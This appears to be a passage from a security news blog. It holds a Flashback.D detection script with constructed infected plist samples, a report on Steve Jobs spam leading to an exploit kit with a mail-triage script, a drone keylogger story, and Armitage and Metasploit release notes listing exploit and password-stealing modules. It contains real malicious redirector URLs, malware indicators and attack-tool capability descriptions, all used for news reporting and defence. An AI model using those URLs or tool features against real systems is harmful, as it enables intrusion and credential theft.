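    """Yield (key path, value) for every string anywhere in a parsed plist, so
    the check does not depend on knowing which key the malware used."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk_strings(value, f"{path}/{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk_strings(value, f"{path}[{index}]")
    elif isinstance(node, str):
        yield path, node


def find_backdoor_references(plist_bytes: bytes) -> List[Tuple[str, str]]:
    """Return every (key path, value) in Info.plist that points at the backdoor module."""
    data = plistlib.loads(plist_bytes)
    return [(p, v) for p, v in walk_strings(data) if "UnHackMeBuild" in v]


def assess(plist_bytes: bytes, module_present: bool) -> str:
    """Combine the two indicators. A module deleted while Info.plist still
    references it is the 'Safari quits on launch' state described in the post."""
    refs = find_backdoor_references(plist_bytes)
    if refs and module_present:
        return "infected"
    if refs:
        return "partially-cleaned"   # file removed, Info.plist not yet edited
    if module_present:
        return "suspicious"          # module on disk but not wired into Safari
    return "clean"


# Constructed sample: a minimal Safari Info.plist with an injected entry. The
# key used (LSEnvironment/DYLD_INSERT_LIBRARIES) is an assumption for the demo;
# the post does not say which key Flashback.D wrote.
INFECTED_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>CFBundleIdentifier</key><string>com.apple.Safari</string>
    <key>CFBundleExecutable</key><string>Safari</string>
    <key>LSEnvironment</key>
    <dict>
        <key>DYLD_INSERT_LIBRARIES</key>
        <string>/Applications/Safari.app/Contents/Resources/UnHackMeBuild</string>
    </dict>
</dict>
</plist>
"""

# Constructed sample: the same bundle metadata without the injected entry.
CLEAN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>CFBundleIdentifier</key><string>com.apple.Safari</string>
    <key>CFBundleExecutable</key><string>Safari</string>
</dict>
</plist>
"""


def scan_live_system() -> str:
    """Run the same check against the real Safari bundle on this Mac."""
    with open(SAFARI_INFO_PLIST, "rb") as fh:
        return assess(fh.read(), os.path.exists(BACKDOOR_MODULE))


if __name__ == "__main__":
    for label, blob in (("constructed infected plist", INFECTED_PLIST),
                        ("constructed clean plist", CLEAN_PLIST)):
        print(label, "->", find_backdoor_references(blob))
    if os.path.exists(SAFARI_INFO_PLIST):
        print("live Safari.app:", scan_live_system())
```

Run it as is to see the two constructed samples classified; on a Mac it also inspects the real Safari.app. A "partially-cleaned" result is the case the post warns about: the plist entry has to be removed as well, or Safari will look for the module at launch and quit.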





Steve Jobs: Not Dead Yet! Emails Lead to Malware


We are all aware of Steve Jobs's death, but the event is being misused by cyber criminals. We have previously seen Facebook scams follow the death of a public figure, and a scam exploiting Steve Jobs's death was started on Facebook on Thursday. Claiming that free iPads were being given away “in memory of Steve,” the Facebook page was quickly taken down after the media began to report on it.
But it is not over yet: security researchers from M86 Labs have intercepted a currently spreading Steve Jobs spam campaign, with subject lines suggesting that he is still alive.

Steve Jobs Alive!
Steve Jobs Not Dead!
Steve Jobs: Not Dead Yet!
Is Steve Jobs Really Dead?


The URL links in the spam are many and varied. The websites that they point to all look to be hacked by the addition of obfuscated code that, after two layers of redirects, ultimately ends up at a BlackHole exploit kit landing page.


The intermediary redirect URLs are random-looking domains, with a top level domain of .ms (Montserrat in case you didn’t know), here are some examples:
hxxp://xnyiinobfb[dot]ce[dot]ms/index.php
hxxp://derhvbq[dot]ce[dot]ms/index.php
The purpose of the exploit kit is to try and exploit vulnerabilities on the system and eventually download malicious executable files. At this stage, we are not sure what the ultimate payload is, as no files were actually downloaded on our test system.
Unfortunately, many people may find this spam campaign “click-worthy” given the icon that Steve Jobs was. The usual advice applies – avoid clicking links in unsolicited email. In this case, one simple click is all it takes to get compromised.

-News Source (M86lab)
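The M86 report above gives two things a mail gateway or SOC can match on: the four subject lines and the shape of the intermediary redirectors (a random-looking label under a .ms domain, serving index.php, published defanged as hxxp and [dot]). The following is an added example, not M86's or this blog's code, that refangs the published indicators, then triages a constructed mailbox against both signals. The message format (a dict with subject and body) and the .ms host heuristic are assumptions for the demo; the heuristic is deliberately loose and will also match legitimate .ms sites, so treat hits as leads to review rather than verdicts.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import urlparse

# Subject lines M86 Labs reported for the campaign (from the post above).
CAMPAIGN_SUBJECTS = {
    "steve jobs alive!",
    "steve jobs not dead!",
    "steve jobs: not dead yet!",
    "is steve jobs really dead?",
}

# Redirector shape from the post: <random label>.<parent>.ms serving index.php.
# Loose by design (assumed heuristic); it will also match legitimate .ms hosts.
MS_REDIRECTOR_HOST = re.compile(r"^[a-z0-9-]+\.[a-z0-9-]+\.ms$", re.I)
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.I)


def refang(indicator: str) -> str:
    """Undo the hxxp:// and [dot] defanging used when indicators are published,
    so they can be compared with what actually arrives in mail."""
    s = re.sub(r"^hxxp", "http", indicator.strip(), flags=re.I)
    return re.sub(r"\[(?:dot|\.)\]", ".", s, flags=re.I)


def is_ms_redirector(url: str) -> bool:
    """True when the URL's host matches the .ms redirector shape and serves index.php."""
    parts = urlparse(url)
    host = (parts.hostname or "").lower()
    return bool(MS_REDIRECTOR_HOST.match(host)) and parts.path.lower().endswith("index.php")


def classify(message: Dict[str, str]) -> List[str]:
    """Return the reasons a message matches the campaign (empty list = no match)."""
    reasons: List[str] = []
    if message.get("subject", "").strip().lower() in CAMPAIGN_SUBJECTS:
        reasons.append("subject is a reported campaign lure")
    for url in URL_RE.findall(message.get("body", "")):
        if is_ms_redirector(url):
            reasons.append(f"link to .ms redirector host {urlparse(url).hostname}")
    return reasons


def triage(messages: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (subject, reasons) for every message that matched at least one signal."""
    results = [(m.get("subject", ""), classify(m)) for m in messages]
    return [(subject, reasons) for subject, reasons in results if reasons]


# Indicators exactly as defanged in the post, refanged for matching.
PUBLISHED_REDIRECTORS = [refang(u) for u in (
    "hxxp://xnyiinobfb[dot]ce[dot]ms/index.php",
    "hxxp://derhvbq[dot]ce[dot]ms/index.php",
)]

# Constructed sample mailbox: two lures built from the published indicators
# (one with a campaign subject, one with an unrelated subject) and one benign mail.
SAMPLE_MESSAGES = [
    {"subject": "Steve Jobs: Not Dead Yet!",
     "body": f"Exclusive footage here: {PUBLISHED_REDIRECTORS[0]}"},
    {"subject": "Re: quarterly numbers",
     "body": f"see {PUBLISHED_REDIRECTORS[1]} for the photos"},
    {"subject": "Re: quarterly numbers",
     "body": "Draft is at https://intranet.example/finance/q3.pdf"},
]

if __name__ == "__main__":
    for subject, reasons in triage(SAMPLE_MESSAGES):
        print(f"[HIT] {subject!r}: {'; '.join(reasons)}")
```

The second sample shows why the URL signal matters: the same redirector arrives under an innocuous subject and the subject list alone would miss it. In a real deployment the .ms heuristic should be narrowed to the observed parent zone or replaced by a feed of the actual redirector hosts.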




Stealthy Keylogger Malware Infected U.S. Drone Fleet & Gained Remote Access on Their Flying Missions



A computer virus has infected the cockpits of America’s Predator and Reaper drones, logging pilots’ every keystroke as they remotely fly missions over Afghanistan and other warzones.
The virus, first detected nearly two weeks ago by the military’s Host-Based Security System, has not prevented pilots at Creech Air Force Base in Nevada from flying their missions overseas. Nor have there been any confirmed incidents of classified information being lost or sent to an outside source. But the virus has resisted multiple efforts to remove it from Creech’s computers, network security specialists say. And the infection underscores the ongoing security risks in what has become the U.S. military’s most important weapons system.
“We keep wiping it off, and it keeps coming back,” says a source familiar with the network infection, one of three that told Danger Room about the virus. “We think it’s benign. But we just don’t know.”
Military network security specialists aren’t sure whether the virus and its so-called “keylogger” payload were introduced intentionally or by accident; it may be a common piece of malware that just happened to make its way into these sensitive networks. The specialists don’t know exactly how far the virus has spread. But they’re sure that the infection has hit both classified and unclassified machines at Creech. That raises the possibility, at least, that secret data may have been captured by the keylogger, and then transmitted over the public internet to someone outside the military chain of command.


-News Source (Wired)


Armitage (Graphical Cyber Attack Management Tool for Metasploit) 09.26.11 Released


Armitage 09.26.11 released.

Description:-
Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don’t use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help you.

Official change log for Armitage 09.26.11:-

  • Improved performance when launching exploits and other modules that open a new tab.
  • Launching an exploit will only open a tab when fewer than four hosts are highlighted. If four or more are highlighted, then Armitage will use the old behavior of silently launching each exploit. [You're supposed to be able to attack hundreds of hosts at once--hence my desire to add this caveat]
  • When launching an exploit in the background, Armitage will show a dialog indicating that the exploit was launched against X hosts.
  • You may now drag and drop Armitage tabs to rearrange their order.
  • Armitage “show all commands” option (for better exploit feedback) is now on by default.
  • You may now right-click a screenshot/webcam shot to zoom in or out on the image. The zoom-level stays fixed (in case you refresh the image later)
  • Added a menu to the X button in the tabs. Through this menu you may open the current tab in its own window or close all like tabs.
  • Updated Hosts -> Import Hosts to reflect the current importable file types.
  • Added View -> Reporting -> Export Data to dump most Metasploit tables into TSV and XML files suitable for parsing (by you!) into a report format of some sort.
  • Armitage now encodes (-e x86/shikata_ga_nai -i 3) any Windows meterpreter payload generated from the module launcher dialog.
  • [host] -> Meterpreter -> Access -> Duplicate now uses multi_meter_inject to launch Meterpreter into memory directly (rather than upload and execute a file)
  • In teaming mode, Armitage will now automatically upload a file selected through the + option (e.g., USER_FILE +) to the Metasploit server and set the value in Metasploit accordingly.
  • Modified error output for a failed Metasploit method to only display the method name and error message. Displaying a large input would cause Armitage UI to start flashing in some weird disco mode until a hard reset. Yeaah!
To Download Armitage 09.26.11 Click Here




Famous Framework Metasploit v4.0.0

The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task.

New Exploit Modules:

VSFTPD v2.3.4 Backdoor Command Execution
Java RMI Server Insecure Default Configuration Java Code Execution
HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow
Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability
Black Ice Cover Page ActiveX Control Arbitrary File Download
Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability
MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
Lotus Notes 8.0.x – 8.5.2 FP2 – Autonomy Keyview
RealWin SCADA Server DATAC Login Buffer Overflow
Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow
Iconics GENESIS32 Integer overflow version 9.21.201.01
Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow
Sielco Sistemi Winlog Buffer Overflow
Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
HP OmniInet.exe Opcode 20 Buffer Overflow
HP OmniInet.exe Opcode 27 Buffer Overflow
Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow
Lotus Notes 8.0.x – 8.5.2 FP2 – Autonomy Keyview

New Post-Exploitation Modules:

Winlogon Lockout Credential Keylogger
Windows Gather Microsoft Outlook Saved Password Extraction
Windows Gather Process Memory Grep
Windows Gather Trillian Password Extractor
Windows PCI Hardware Enumeration
Windows Gather FlashFXP Saved Password Extraction
Windows Gather Local and Domain Controller Account Password Hashes
Windows Gather Nimbuzz Instant Messenger Password Extractor
Windows Gather CoreFTP Saved Password Extraction
Internet Download Manager (IDM) Password Extractor
Windows Gather SmartFTP Saved Password Extraction
Windows Gather Bitcoin wallet.dat
Windows Gather Service Info Enumeration
Windows Gather IPSwitch iMail User Data Enumeration

New Auxiliary Modules:

John the Ripper Password Cracker Fast Mode
Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS
Kaillera 0.86 Server Denial of Service
2Wire Cross-Site Request Forgery Password Reset Vulnerability
SIPDroid Extension Grabber
MSSQL Password Hashdump


Notable Features & Closed Bugs:-

Feature #4982 – Support for custom executable with psexec
Feature #4856 – RegLoadKey and RegUnLoadKey functions for the Meterpreter stdapi
Feature #4578 – Update Nmap XML parsers to support Nokogiri parsing
Feature #4417 – Post exploitation module to harvest OpenSSH credentials
Feature #4015 – Increase test coverage for railgun
Bug #4963 – Rework db_* commands for consistency
Bug #4892 – non-windows meterpreters upload into the wrong filename
Bug #4296 – Meterpreter stdapi registry functions create key if one doesn’t exist
Bug #3565 – framework installer fails on RHEL (postgres taking too long to start)

Armitage integrates with Metasploit 4.0 to:-


Take advantage of the new Meterpreter payload stagers
Crack credentials with the click of a button
Run post modules against multiple hosts
Automatically log all post-exploitation activity
Revision Information:

Framework Revision 13462
Several import parsers were rewritten to use Nokogiri for much faster processing of large import files. Adding to Metasploit’s extensive payload support, Windows and Java Meterpreter now both support staging over HTTP and Windows can use HTTPS. In a similar vein, POSIX Meterpreter is seeing some new development again. It still isn’t perfect nor is it nearly as complete as the Windows version, but many features already work. Java applet signing is now done directly in Ruby, removing the need for a JDK for generating self-signed certificates. The Linux installers now ship with ruby headers, making it possible to install native gems in the Metasploit ruby environment.

Another flexibility improvement comes in the form of a consolidated pcap interface. The pcaprub extension ships with the Linux installers as of this release and support for Windows will come soon. Modules that used Racket for generating raw packets have been converted to Packetfu, which provides a smoother API for modules to capture and inject packets.

To download Metasploit Framework v4.0.0 Click Here
For more information about MSF click here

